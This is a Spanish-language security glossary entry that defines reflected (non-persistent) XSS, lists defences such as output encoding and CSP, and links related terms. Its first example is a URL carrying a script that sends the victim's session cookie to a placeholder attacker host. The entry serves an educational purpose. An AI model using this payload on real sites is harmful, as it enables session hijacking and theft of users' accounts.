XSS Reflejado
¿Qué es XSS Reflejado?
XSS ReflejadoXSS no persistente en el que una entrada controlada por el atacante se refleja inmediatamente en la respuesta y se ejecuta en el navegador de la víctima.
El XSS reflejado (no persistente o Tipo 1) ocurre cuando una aplicación toma datos de una petición HTTP, normalmente un parámetro de URL o campo de formulario, y los reenvía en la respuesta sin codificación de salida apropiada. El ataque requiere que la víctima haga clic en un enlace manipulado, por lo que suele distribuirse mediante phishing, malvertising o mensajería. Una explotación exitosa permite robar cookies de sesión, ejecutar acciones en nombre del usuario o encadenar una toma total de cuenta. Las defensas incluyen codificación HTML sensible al contexto, una Política de Seguridad de Contenidos estricta y frameworks que escapan automáticamente la salida.
● Ejemplos
- 01
https://ejemplo.com/buscar?q=<script>document.location='https://malo/?c='+document.cookie</script>
- 02
Página de error que refleja un parámetro 'mensaje' sin sanear directamente en el DOM.
● Preguntas frecuentes
¿Qué es XSS Reflejado?
XSS no persistente en el que una entrada controlada por el atacante se refleja inmediatamente en la respuesta y se ejecuta en el navegador de la víctima. Pertenece a la categoría de Ataques y amenazas en ciberseguridad.
¿Qué significa XSS Reflejado?
XSS no persistente en el que una entrada controlada por el atacante se refleja inmediatamente en la respuesta y se ejecuta en el navegador de la víctima.
¿Cómo funciona XSS Reflejado?
El XSS reflejado (no persistente o Tipo 1) ocurre cuando una aplicación toma datos de una petición HTTP, normalmente un parámetro de URL o campo de formulario, y los reenvía en la respuesta sin codificación de salida apropiada. El ataque requiere que la víctima haga clic en un enlace manipulado, por lo que suele distribuirse mediante phishing, malvertising o mensajería. Una explotación exitosa permite robar cookies de sesión, ejecutar acciones en nombre del usuario o encadenar una toma total de cuenta. Las defensas incluyen codificación HTML sensible al contexto, una Política de Seguridad de Contenidos estricta y frameworks que escapan automáticamente la salida.
¿Cómo defenderse de XSS Reflejado?
Las defensas contra XSS Reflejado combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.
¿Cuáles son otros nombres para XSS Reflejado?
Nombres alternativos comunes: XSS no persistente, XSS Tipo 1.
● Términos relacionados
- attacks№ 240
Cross-Site Scripting (XSS)
Vulnerabilidad web que permite a un atacante inyectar scripts maliciosos en páginas vistas por otros usuarios, ejecutándose en el navegador de la víctima bajo el origen del sitio.
- attacks№ 1107
XSS Almacenado
Vulnerabilidad de scripting entre sitios persistente: el script del atacante se guarda en el servidor y se ejecuta en el navegador de cada visitante.
- attacks№ 347
XSS Basado en DOM
Variante de XSS donde la inyección y la ejecución ocurren totalmente en el navegador porque JavaScript del cliente escribe datos no confiables en un sink sin sanear.
- appsec№ 214
Política de Seguridad de Contenidos (CSP)
Cabecera HTTP que indica al navegador qué orígenes de scripts, estilos, marcos y otros recursos están permitidos, limitando el impacto de XSS y de inyecciones de datos.
- attacks№ 821
Phishing
Ataque de ingeniería social en el que el atacante se hace pasar por una entidad de confianza para engañar a la víctima y obtener credenciales, dinero o ejecutar malware.
- appsec№ 773
Codificación de salida
Transformar datos no confiables a un formato seguro para un contexto específico (HTML, JavaScript, URL, SQL, shell) para que no escapen y se ejecuten como código.
● Véase también
- № 104XSS Ciego